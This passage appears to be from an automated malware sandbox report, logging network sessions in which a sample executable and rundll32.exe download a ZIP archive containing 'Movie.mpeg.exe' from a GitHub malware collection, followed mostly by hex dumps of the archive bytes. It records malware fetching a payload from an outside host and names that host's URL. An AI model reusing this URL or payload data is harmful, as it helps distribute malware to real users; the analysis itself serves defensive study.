                                                                                                                                                            2022-09-29 12:44:46 UTC496INData Raw: 3f 97 e0 b2 12 61 ba ea fd 30 36 3e 33 2e 0d cb 94 43 4b 7f 6d e9 43 11 8f d1 94 a5 b5 3f 40 5a c7 29 35 20 35 d1 12 36 f9 57 23 5b 7a 0e 2e 88 72 ae 0f 41 2a 34 00 83 72 eb ab bd 5c f0 9b a1 f4 bd 88 57 cf 32 6b 94 96 b7 80 a7 19 49 6d e4 76 46 ec a4 f5 42 b3 9c 43 c8 02 6c 3c 25 b3 b8 07 ff fa 90 64 cb 1b 99 08 cc b2 00 92 b3 4d 0e 07 e8 98 ce ff 11 b2 c4 d1 d7 49 32 d5 af 8b 37 2b 02 0f 65 74 6e c2 a2 75 c9 8d 44 49 8f e8 8f c7 d2 19 32 e2 b8 0f b6 39 aa b4 22 69 74 48 26 18 94 39 48 8b 1f a8 3e 91 d3 de 7a db 67 c1 10 69 3a 03 77 42 7c 09 16 db c0 da 3d de b5 3b fd 81 eb 47 de 8f a3 d6 2d 78 4c f8 e3 ec c2 a0 cb 85 4e 5f 59 99 08 3c 2c f1 91 7a c1 87 db 83 a7 56 2d 37 32 21 a2 56 10 30 09 db 21 ed ae e3 1e da 65 8d 86 a0 87 f4 5b 94 f7 e6 fd b6 de d6
                                                                                                                                                            Data Ascii: ?a06>3.CKmC?@Z)5 56W#[z.rA*4r\W2kImvFBCl<%dMI27+etnuDI29"itH&9H>zgi:wB|=;G-xLN_Y<,zV-72!V0!e[
                                                                                                                                                            2022-09-29 12:44:46 UTC512INData Raw: d8 98 c8 88 9a 66 69 3e 09 bd a4 64 cb b9 ca c5 57 db d2 d1 ea 2a 11 5f 40 32 44 6c 77 33 94 1e 74 46 c4 b2 98 3b c0 aa 5f 48 f2 8e 23 88 fb da be 6f 9a b8 f7 2e bc d1 34 c6 be 18 c3 90 95 17 02 08 0d 50 2a 20 90 82 12 03 aa 77 eb 32 bd 04 f1 91 92 d2 17 5c 85 52 4d 01 e1 ae a6 41 79 19 fe 43 5c 1b f6 d8 22 a5 26 b7 14 35 bf 4d 4c a5 22 bd 8b b3 89 9d 0e 45 31 8a 10 cf ea 62 43 af 9d 69 4c 01 6c bd 9e 53 b5 f7 15 c5 f8 d2 eb 58 dd e1 77 b0 d8 1f ea 54 38 36 8d 37 8f 56 61 b9 85 86 2b f1 9d 15 f1 fb 19 b2 45 da 9f e5 c9 7c a8 36 69 ce 4b 9a 2b 25 98 e5 f6 de 57 1b a7 07 e2 e0 08 42 6b 77 72 fd fa 49 b5 47 59 3e da 53 3e 99 b1 d3 39 0c 49 0e ba a8 f7 6e 56 1d f7 0c 28 f5 b3 59 06 99 57 15 19 0a 26 7f a1 d7 f7 26 63 e9 9a 62 9d fa 6f b8 a9 25 0b 2d 7d 05 62
                                                                                                                                                            Data Ascii: fi>dW*_@2Dlw3tF;_H#o.4P* w2\RMAyC\"&5ML"E1bCiLlSXwT867Va+E|6iK+%WBkwrIGY>S>9InV(YW&&cbo%-}b


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            90192.168.2.649753140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:13 UTC17037OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            91140.82.121.4443192.168.2.649753C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:13 UTC17037INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:49 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:13 UTC17037INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            92192.168.2.649754185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:13 UTC17039OUTGET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            93185.199.110.133443192.168.2.649754C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:14 UTC17039INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 384539
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "0cab7a1b89e2af64986c2b84b88ccd44dcd6860b69b6ea218a864980f0359863"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0815:F707:9B622:135946:63359359
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:14 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6967-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455514.905188,VS0,VE170
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: d78aded14edbd68f34bcfbe6d454118c0b987387
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:14 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:14 UTC17040INData Raw: 50 4b 03 04 33 00 01 00 63 00 c2 8c 4c 40 00 00 00 00 4d dd 05 00 00 7a 06 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4d 6f 76 69 65 2e 6d 70 65 67 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b6 8a 92 ee e8 62 ae fc e2 00 b1 2f 88 04 96 0a cc 4a 58 55 d5 86 04 2e e4 47 87 5d 38 0b 11 59 f2 ce 8f 3a b7 b8 de 3b c7 bb 1d 5d 19 64 c4 2a 7f d4 a2 f9 a6 98 b6 77 c9 81 c4 bc 63 64 a4 d4 36 39 45 fe 48 3b fa db 60 4c bc d2 c1 2c 9f c0 42 d1 88 ec f9 c7 0a ea 26 58 0d c4 06 ed 19 df 9e 04 73 b6 4b cf 54 95 95 dc cf 08 f9 f0 43 5f 26 e3 16 63 86 25 ec 9e 30 e5 5f 60 1c ec 61 1f cd 23 84 b7 af b8 60 b2 08 37 3a 9a 56 6d 06 6b 26 36 e9 ee 7c 24 c2 aa 51 32 53 43 61 68 5c 72 d5 5f 05 a8 01 5e 4c 0d 24 38 72 86 3a ba 72 a0 21 b5 c9 cf 1b ea 8b ed a1 67 90 6c 5d
                                                                                                                                                            Data Ascii: PK3cL@MzEndermanch@Movie.mpeg.exeAEb/JXU.G]8Y:;]d*wcd69EH;`L,B&XsKTC_&c%0_`a#`7:Vmk&6|$Q2SCah\r_^L$8r:r!gl]
                                                                                                                                                            2022-09-29 12:45:14 UTC17041INData Raw: 1c 68 f5 2f 1b 36 7c 6d 78 d5 52 fa 63 c2 b7 8e 28 79 4a 2c c2 e2 6b ce 4b a7 03 86 08 3c 35 1b 02 fc a1 39 87 66 69 f5 67 43 c0 99 d4 3d 94 d3 13 f9 09 f1 48 98 fa 92 3f 8c 6d 8c c1 df fc a1 73 12 2f ab 87 ce e1 e1 3b 85 90 ed f5 ed 67 67 7c e5 52 eb 9b f3 3c a9 64 df 91 ff bb 94 bc 59 28 0a 70 42 b2 26 90 9f c0 5a b4 64 7d 20 ee 38 9e c5 07 ba 8b 1a 87 7c 8f 5a a1 47 0e 6d 9b 2d 14 6d f8 67 d3 c5 0a 35 bf 55 59 c5 2b 07 31 c5 3b 78 e8 54 31 cd 4c fa dd 1d a3 fe ce 30 94 6c 5e b9 50 47 e6 dd 05 8d c6 8c 79 4c 01 7a e7 c5 91 e7 cf 97 12 5b 22 b9 83 42 98 4e e1 07 55 c7 e0 43 9e 1d c6 3d b9 f6 ef 58 39 c3 3f bc 5a 7d 28 f9 25 01 97 a8 fa fc 2f 22 3d ae e6 e2 fc db 71 47 db f6 9c e9 2d a8 2e 4c ff 9a 84 23 ef d4 47 4b 7d 31 41 6e f0 c0 58 d3 71 d1 e0 a1 51
                                                                                                                                                            Data Ascii: h/6|mxRc(yJ,kK<59figC=H?ms/;gg|R<dY(pB&Zd} 8|ZGm-mg5UY+1;xT1L0l^PGyLz["BNUC=X9?Z}(%/"=qG-.L#GK}1AnXqQ
                                                                                                                                                            2022-09-29 12:45:14 UTC17043INData Raw: 6d 45 dd 12 be 32 41 85 b5 70 10 12 5d 68 8e 19 d8 c6 ec 16 ea 75 6c 5b 3a 7e 2f c0 40 53 31 1f 39 76 51 59 13 74 66 24 73 7a 06 97 8b 83 25 97 02 8f 66 6c 39 ee c1 c1 de 2d 36 c6 20 65 1c bc 3a 4f 54 23 6e 3d 0e b7 c0 98 bb e7 85 c8 46 62 df 4f 20 c3 3e 3e f5 25 d6 1d 87 db 7b 4f 1b 87 b0 ae c1 f8 28 e1 25 36 69 95 5b 89 ac 2e 4f a4 98 c7 83 d2 36 3e 7b a8 58 ce f9 9e 76 b9 9f 55 f7 13 01 ff 8a fa ee 28 df 5a 7c bb 3f 79 b4 3d cc 52 0b e7 2a 2d f2 a4 40 6a 05 8b d5 cf f3 47 11 50 a3 9a 57 c9 80 76 43 d0 05 26 ce 5c 2a 01 6e 2d cd 5e 1f 0f e5 71 63 90 12 b7 e3 2e c5 98 9f fd fc 36 ee 2f 35 8c 6c 59 58 80 2b 48 1e 95 1a 53 5b 72 0e 45 73 c3 1e ad 35 b9 60 8d fb 25 8d e6 52 e3 fa d9 02 f8 61 dd 6d 39 c3 39 a4 2a 74 43 1a dc 96 ac 40 54 f9 4b ef 48 2f 2c 87
                                                                                                                                                            Data Ascii: mE2Ap]hul[:~/@S19vQYtf$sz%fl9-6 e:OT#n=FbO >>%{O(%6i[.O6>{XvU(Z|?y=R*-@jGPWvC&\*n-^qc.6/5lYX+HS[rEs5`%Ram99*tC@TKH/,
                                                                                                                                                            2022-09-29 12:45:14 UTC17044INData Raw: c5 fc 2c ca b4 3f c0 68 5f 7a 20 a9 91 c4 b0 8c ba 28 45 55 c6 7c 0c cb 00 52 3b a0 66 03 78 ed ae d8 56 75 82 77 6d 3f d6 29 2a 3e 23 c6 a2 d2 13 66 d8 61 fa 98 27 5f 59 71 b4 fc 0b f3 0e a2 b7 ef cc 04 85 26 cc ff 86 a2 d2 8a 36 a8 97 34 2a a2 16 ab c5 be 61 09 1c 40 9b 5d 57 5b 2d 26 12 eb c5 7b 02 ec 51 db eb d8 45 de 86 2b 06 b5 e7 af 24 6d e0 70 45 83 16 67 37 2a 01 c2 55 f0 dc a1 f8 5f 7d 2c 6c 21 2c d9 89 35 88 72 72 5e 98 da 0d 9b dc 87 6e 02 2f 63 00 2a 0e 52 77 83 cf e5 3e a5 43 26 92 28 9d 51 66 3c 0b ab 5c bb 57 06 89 34 81 aa bf 28 b4 7f 76 48 e9 25 a1 47 43 5b fa 68 7a 43 a0 72 68 2b ec 6f c9 f6 9f ae 0b 0e 86 1b 8d 39 ed 57 9a 65 6c e4 17 64 91 6f 0c d6 89 38 64 f0 ec 65 cb 1f cb e6 53 7c 07 70 69 96 31 a7 73 f7 6c d6 54 6b e2 eb 38 41 5f
                                                                                                                                                            Data Ascii: ,?h_z (EU|R;fxVuwm?)*>#fa'_Yq&64*a@]W[-&{QE+$mpEg7*U_},l!,5rr^n/c*Rw>C&(Qf<\W4(vH%GC[hzCrh+o9Weldo8deS|pi1slTk8A_
                                                                                                                                                            2022-09-29 12:45:14 UTC17045INData Raw: 9d f9 a8 bb 6b 2f 03 8a 0c 91 4d be bd 3c 6b 1f dd 15 0b 7c 13 aa f4 10 9c 51 a4 35 02 eb 76 27 10 e1 bd 17 3b 6d 69 64 27 e7 30 4c 01 9f e0 01 85 46 06 c3 2a 50 38 27 d4 9d d5 ea 9b 5e 66 38 dc e4 ec 78 9f 89 c0 9b 07 32 66 6e 9f 60 1a 67 08 69 e3 f6 7f 0d 02 0e 83 11 93 1d f4 82 78 94 87 45 d3 bf 80 57 19 a2 9b f9 8b 28 4f 67 31 a3 a4 6a 75 b8 66 eb eb 6b f3 22 6e 62 c1 e8 00 04 79 b4 6e 8c b1 e0 0a 89 f8 22 16 1c 31 8b 0b 43 95 a3 21 22 bc 98 50 50 bb 4f b0 c8 ce 65 77 7a 19 e6 93 0c 52 ea 41 4f 0c 7a a2 8a 0a d7 7c 05 d8 a5 8d bc 77 ce de d2 c3 fb b9 c4 f2 c9 2c 00 47 a0 37 37 bd 71 97 16 5b 65 d4 8b e5 e3 7c 82 50 c3 a5 86 31 35 15 a1 d8 6e ad 71 34 3d be f1 4e b5 0d b7 7b 5d f4 9d cf 2d 3c 9f 4c 0c 0c bd 75 35 6b 27 9f 82 35 2b 06 15 42 d2 5e ea 75
                                                                                                                                                            Data Ascii: k/M<k|Q5v';mid'0LF*P8'^f8x2fn`gixEW(Og1jufk"nbyn"1C!"PPOewzRAOz|w,G77q[e|P15nq4=N{]-<Lu5k'5+B^u
                                                                                                                                                            2022-09-29 12:45:14 UTC17047INData Raw: 30 3d 66 fb 2d eb 4f 87 80 69 ca 12 32 5e 3f ca 11 8c 65 bc 25 9c 90 fe 4b a5 c8 e3 b8 98 11 b0 69 88 20 bb 8a 94 e3 74 f7 e4 09 f1 ee b7 96 3d 1a d4 3e d9 4d 75 40 ae 37 f5 45 1c d5 c5 f4 a1 38 aa 9f 92 2c b8 9d fe f4 8e 1c 66 3b 66 e4 2b f6 0b dd a9 9a da a8 40 77 52 0d cd b8 b7 52 9b cb 7a 92 3b 3d 78 1a 36 06 5c cc 41 27 49 6c 59 66 3f be b9 1d 99 09 36 43 71 c4 aa 71 a3 22 34 40 50 22 08 3a 41 67 e0 42 72 4e 78 65 89 6a c6 76 db e0 8d 32 00 c1 2f db 7f a3 4d 34 73 8e d0 cd 0b 75 04 88 54 91 33 4f b7 ca 03 33 2d f7 1e db 3a df 22 7e 85 17 a0 41 88 01 5f 5e 67 86 ae 15 43 d1 4a 6b 27 71 3b 39 f2 9e 05 1a ff e8 0b 48 c5 3d 3a e9 6e 59 89 4e e6 05 3b a5 48 2f 61 6b fc 4c 9a 41 d1 1a ed ae 1e c1 b3 ef e9 38 09 e5 4e ca 20 9e 78 12 b9 1a 0e 19 71 78 4c 42
                                                                                                                                                            Data Ascii: 0=f-Oi2^?e%Ki t=>Mu@7E8,f;f+@wRRz;=x6\A'IlYf?6Cqq"4@P":AgBrNxejv2/M4suT3O3-:"~A_^gCJk'q;9H=:nYN;H/akLA8N xqxLB
                                                                                                                                                            2022-09-29 12:45:14 UTC17048INData Raw: a8 de 6e f2 96 d5 c7 17 0a 0a 8a f6 2b b0 7a f2 81 b9 f3 11 40 d7 1d 88 aa 45 e2 a0 63 8f 7c 8c 7a 68 76 e5 bb bc e4 4f e7 2b 8e 05 a8 08 05 1a 5e af 54 c9 88 bd 78 69 bb df 31 f0 41 4f ec 41 6c d7 bd 25 fe 1a f8 e1 96 df 9c f9 ac f3 b3 a1 0e 7d f3 d9 6a 73 9a b6 f3 82 3d 8f 94 67 d1 56 1d a9 dc 29 1f 64 bc 97 4d 6d 06 85 d3 e3 f4 be 76 5c 11 75 1a f8 c7 a4 15 54 11 b5 25 4a 7b e8 cc 66 f5 7f 97 b0 a1 3f 88 b2 72 4c ec b1 04 98 13 4c 36 b3 2d 3b cc d3 f4 14 4d 17 97 36 4f fb d8 7b 25 52 bf bb 05 d8 a9 18 68 4d 78 c1 d7 d2 b7 10 b4 76 1a 21 c3 fd 2b 9f 48 db 13 f6 a5 b6 48 34 a3 9e b7 ee a2 50 31 54 47 3b 86 c8 d7 c0 f2 0b 3a 82 2a e3 c1 6b a9 ef bd 9a 8f a2 70 db b5 e9 2c 21 34 e5 14 65 5f 2f ab 5c 1f 7f 8e 5f 85 4c 5e 2a c9 be 78 75 31 db 30 23 1e 68 69
                                                                                                                                                            Data Ascii: n+z@Ec|zhvO+^Txi1AOAl%}js=gV)dMmv\uT%J{f?rLL6-;M6O{%RhMxv!+HH4P1TG;:*kp,!4e_/\_L^*xu10#hi
                                                                                                                                                            2022-09-29 12:45:14 UTC17049INData Raw: 15 06 60 ef f5 03 b3 ae d6 70 a3 2c eb ae 2c 63 93 d9 77 3a 37 1a 32 6d 01 68 81 53 aa fd 56 f0 70 a9 b2 e7 20 4e 77 2e 81 e8 de 69 99 4a 36 31 03 25 da a0 68 04 07 65 bf 2d f5 bc d4 f8 3b 81 42 dd cd f6 86 17 98 47 89 cc 09 de f1 23 4b 25 24 d3 65 dc 91 41 5c c9 06 17 a8 a4 ee da 64 4d c7 1f 98 db 51 35 fd be cc da 0d 65 25 03 63 5e 75 ae 89 d3 0d ce d4 52 3f bc 7c 4f 4b 5a 39 52 db a4 f7 c6 69 c8 67 1b d4 2d 6e 20 6a 09 7c 70 46 3b c9 7c 53 26 2f fd 2f bc 22 88 1f e5 2e 7e 2f 1b 41 e4 d5 09 62 86 93 b1 f6 82 b1 ff aa 65 d1 c4 bf 30 d9 b4 d9 c8 47 af 38 a8 2c 48 03 bd f7 dc 13 a5 98 98 8e d7 46 95 6e 3b 2e 71 98 9b a2 47 0c be 75 4f 5b 48 5b f5 68 ae fe 08 53 ef 53 50 0a 50 1f 12 52 21 ed 42 f9 8b 3a 81 37 84 37 94 0b 53 97 31 62 44 6b dd 3f bb 17 51 77
                                                                                                                                                            Data Ascii: `p,,cw:72mhSVp Nw.iJ61%he-;BG#K%$eA\dMQ5e%c^uR?|OKZ9Rig-n j|pF;|S&//".~/Abe0G8,HFn;.qGuO[H[hSSPPR!B:77S1bDk?Qw
                                                                                                                                                            2022-09-29 12:45:14 UTC17051INData Raw: 4f c2 c0 0d 13 0c dc 97 52 2a f5 ba f3 85 3b a1 42 9a 35 85 b5 8b 94 53 12 9d 62 d7 e7 9d 43 50 48 f9 4a 01 11 d7 0c ad 85 9e ef 3f 15 94 7f f2 4d 71 eb 4b 6c fa 8a 67 ba a5 e4 52 7c a9 f2 59 38 82 c1 f4 60 dd 07 d3 97 7f 4d 98 ec 1c ce ad ff 39 8d af 38 84 3c 25 31 01 89 40 c5 35 48 05 e4 16 bd 33 84 57 de 44 fc 38 72 5d c4 5c 38 13 78 a8 64 96 14 d6 a1 c9 06 09 0e e3 e6 7a 8b eb 9c 4f a9 7e ca a1 98 35 06 2a 3c 16 5b 80 3e d9 a0 7a 3a 23 94 ad b2 c9 14 29 c4 b6 83 1d 86 b3 3d 87 6b 26 7b 7f 3c aa e2 41 38 bb 33 b3 d2 13 7a 7d af 61 7d 3f 56 7b 89 06 23 f8 54 f7 92 17 fa 3b 6a 9f 70 29 66 e5 a6 ae 4f 5c 8d 31 b6 dc cc 19 06 54 3b 43 ee a0 d0 80 5d 60 05 f7 3a cf 9e 94 ec d7 84 ec bc ad bc 89 8d 1b 6b bb 95 86 66 89 c3 31 45 fd f9 1a 99 d6 5b dc 05 e5 83
                                                                                                                                                            Data Ascii: OR*;B5SbCPHJ?MqKlgR|Y8`M98<%1@5H3WD8r]\8xdzO~5*<[>z:#)=k&{<A83z}a}?V{#T;jp)fO\1T;C]`:kf1E[
                                                                                                                                                            2022-09-29 12:45:14 UTC17052INData Raw: 42 e7 b6 f2 3b b9 f6 a3 75 fc d0 0a c9 12 25 36 b2 d2 47 86 a0 6f 31 88 a6 19 2d 44 ee ee d6 e2 9a ce 48 08 97 51 73 dc 33 10 8b 3e 51 c1 47 62 f0 7f 2c cb 94 73 70 ce 22 20 cf 85 3e 48 74 02 fb 2e 74 e6 03 2b cb ce 73 06 10 a2 4b b8 e6 20 96 4c 6c 90 b5 35 35 67 12 5b 8a 2a 05 e6 43 d5 e2 16 a7 77 e2 61 3e 6b 4d a4 f7 e8 a7 e6 5e c2 b8 29 20 1c 39 aa f6 9b a5 3c 9e 73 d7 36 3c cf 9d ce ab d0 b9 ca e7 1d 7f 79 c0 b3 fa 1f 41 d7 fa fb 46 86 29 9b a8 2b 61 0b 59 46 7a fa 6f 7b dc 3b c9 93 04 ff 17 c6 bf cc 69 c5 c1 a6 d7 3c 06 a7 8c ee 1e 41 80 fd 91 ff 30 10 dd 07 ea b7 3e 37 d3 96 f8 44 02 bf 2c bc 52 b2 c8 21 1b 9b 11 a4 eb 89 6c ca 65 f5 8b dd 97 63 cd d7 18 f6 a4 18 59 45 9b a3 52 fd 8f f9 92 0d 2e e8 9c b4 18 31 85 ba 96 c5 3f b2 00 f0 ad 55 41 7e 32
                                                                                                                                                            Data Ascii: B;u%6Go1-DHQs3>QGb,sp" >Ht.t+sK Ll55g[*Cwa>kM^) 9<s6<yAF)+aYFzo{;i<A0>7D,R!lecYER.1?UA~2
                                                                                                                                                            2022-09-29 12:45:14 UTC17053INData Raw: 4a 11 42 9a f5 5b 2a 8a 55 a8 16 ab dc 2c 0c a3 e6 a6 5c 58 4f 4e 62 af fa e3 e6 16 03 3a bf a5 2f 0e c8 3a a5 7e 2b a4 d7 5b 3a e4 ba 16 c8 14 e4 ca b8 b6 3a 77 6b 0b 4a 1c 7f c9 65 06 b8 1f ab 39 34 67 5f 88 7d 08 98 76 c3 26 75 08 b2 e2 89 cc e0 92 95 5b fa ec 17 48 22 83 45 65 aa 14 36 1e 58 7b 3b c7 6b 34 44 10 bc df e4 03 40 86 c3 24 be 1c af a2 e6 77 88 b3 23 fa af bf cd d1 1f 43 70 4d 35 21 0a 5e 08 ed cf 30 14 61 75 83 70 64 e5 cf e6 b2 2d a9 aa 42 78 c2 c3 21 2c 9b 1b 52 d1 4f dd a0 d1 7e 88 ae 26 83 5b ba cb c5 d9 73 35 d9 54 ea 57 8d 41 07 52 98 52 00 37 13 36 60 d9 13 2b 02 a8 44 55 d9 52 27 e9 47 fb 25 a6 32 d1 78 3c f8 6c a5 ea fb 92 06 57 cf 46 a1 1f 08 49 7f 7a 65 a3 16 cf 66 40 9f ef d9 07 18 e2 91 66 8f 08 14 57 72 16 47 19 9f d8 48 e6
                                                                                                                                                            Data Ascii: JB[*U,\XONb:/:~+[::wkJe94g_}v&u[H"Ee6X{;k4D@$w#CpM5!^0aupd-Bx!,RO~&[s5TWARR76`+DUR'G%2x<lWFIzef@fWrGH
                                                                                                                                                            2022-09-29 12:45:14 UTC17055INData Raw: 2c 4c 10 09 cd 1e 55 0f 94 40 cb e2 fe 17 4f 2b b1 b6 e4 d5 bc a4 68 36 ea 32 02 02 9f 75 27 c6 b5 94 ed 58 81 14 f4 77 72 7a d2 18 41 c5 ef 97 bf 54 09 83 f9 d2 91 30 aa a1 c7 d4 fb c4 7e ac e9 c3 19 6f 8a 8f 39 57 3a bd ca 30 d2 12 65 ff 56 f3 07 33 85 60 e1 59 61 36 27 36 f5 25 b9 43 9d 3a 44 35 0f a0 a3 d7 f9 78 1e 62 ce 38 46 69 a6 b3 b4 fb 8c 60 74 cf 4d 7a 1f 3c d7 c8 8f b6 0e 71 40 15 95 1d ea ed 76 1c 37 87 b2 26 e8 fc 1d d8 b1 90 c4 03 e5 72 08 f2 e3 f2 75 73 d5 3f 85 4d 75 96 5f cb 86 af c9 c2 04 6c 7b d7 54 a1 6e 1d b4 e1 53 9a 9a 5d d8 ca 74 0b 87 f7 24 9f 02 cf 0a 66 ca 71 f8 ca ef 0d db 47 65 6c 0b 82 4e 41 bb 04 88 29 cb 52 57 5a a4 03 53 8c 9f 11 c2 9c ef 2b 64 93 e7 50 ef d9 d2 0e c9 0f c6 01 44 33 16 79 5e d5 74 b8 b2 ec 9a 27 21 42 fc
                                                                                                                                                            Data Ascii: ,LU@O+h62u'XwrzAT0~o9W:0eV3`Ya6'6%C:D5xb8Fi`tMz<q@v7&rus?Mu_l{TnS]t$fqGelNA)RWZS+dPD3y^t'!B
                                                                                                                                                            2022-09-29 12:45:14 UTC17055INData Raw: 47 bd 44 3b dd 8b 1a 92 69 97 01 96 b4 42 23 a4 8e 16 d5 fd 70 fe 6b 78 27 49 69 9a 8e aa 7f 2e 84 9d 3d f5 dd 9c f2 70 6f 86 8e 2c fe a5 70 ab ad 03 f6 7d 8c d4 61 79 d8 0e 9c 21 a4 5a 85 dc ad d4 c9 a4 d7 51 ed 69 e1 f4 94 55 60 ea 39 cd 3a fe 31 84 39 8c 51 40 04 03 41 6e 74 cc fa 70 f2 5f 12 a6 6f 5f b8 4f 8a 83 21 0b 04 1f 68 0d 40 be 8e c9 d4 ef 47 3a af 77 6a cf 09 5a 5c 53 9e 52 f6 5d f0 45 e1 f1 2b 78 6b e7 f3 55 e5 ba 70 d9 5d 6a 3f 28 a4 b7 c3 28 2f e1 96 ce a0 de dc af ca ea 2f f0 a1 6a 51 b2 1d 99 a1 5e 51 97 88 33 7d 24 1d a2 bf 2f 64 8d d6 9e cd 46 b2 03 5c be 64 15 3a 9a 46 94 be 10 69 3f 84 eb c3 2c b1 f4 6f 89 42 7d da 22 c2 95 68 f4 cd 3d 55 54 0b d9 67 b4 bf 43 9a ca d6 d7 7f 53 a0 05 de 72 60 5f 75 0c 1d c4 d3 3c 15 a0 bc 4e 1b 55 b1
                                                                                                                                                            Data Ascii: GD;iB#pkx'Ii.=po,p}ay!ZQiU`9:19Q@Antp_o_O!h@G:wjZ\SR]E+xkUp]j?((//jQ^Q3}$/dF\d:Fi?,oB}"h=UTgCSr`_u<NU
                                                                                                                                                            2022-09-29 12:45:14 UTC17071INData Raw: 63 e1 9f d9 64 f1 fd e9 64 e5 9e a8 76 93 45 a1 e0 24 40 f4 5e 5f 36 ac 9b 8c 99 50 05 e3 45 56 0c 02 60 b9 87 68 92 92 e6 47 03 50 07 40 2e 73 b3 41 6d 94 ce 9b b3 29 76 26 21 37 f5 3c e4 e9 29 67 42 d2 13 ba 46 fe 48 66 e6 08 de c6 0a 40 52 4e 36 44 02 29 f9 f7 0c 9b 8e ca de f3 fc 83 b5 ba 69 85 d8 87 ef 5b 21 19 7a 60 8c c1 ca dd c5 1c c8 e7 fa 9a 67 7e ad 00 9e ee 1e 78 69 e0 9a f1 b2 6b 02 e4 86 85 b5 b1 47 e4 c4 66 1e a3 3d 9b 51 33 12 5f 65 d6 ff af b9 88 31 b3 5b f8 37 d8 9e 45 b7 05 41 6e c3 19 27 1a 72 0d 8a 0b e0 02 c4 87 54 1a 2d d3 50 a7 f3 30 a9 10 23 40 62 7f 7e d4 3f 9c 50 a5 b6 55 9d f2 69 69 91 e2 25 a9 87 ff d3 23 36 8a 02 0b e0 24 5b f7 28 9c 73 b7 0d 51 fc d7 9e 61 3f e7 a5 46 fa 6b 85 b2 11 38 59 13 45 91 57 0f 49 49 12 cd c3 a2 3b
                                                                                                                                                            Data Ascii: cddvE$@^_6PEV`hGP@.sAm)v&!7<)gBFHf@RN6D)i[!z`g~xikGf=Q3_e1[7EAn'rT-P0#@b~?PUii%#6$[(sQa?Fk8YEWII;
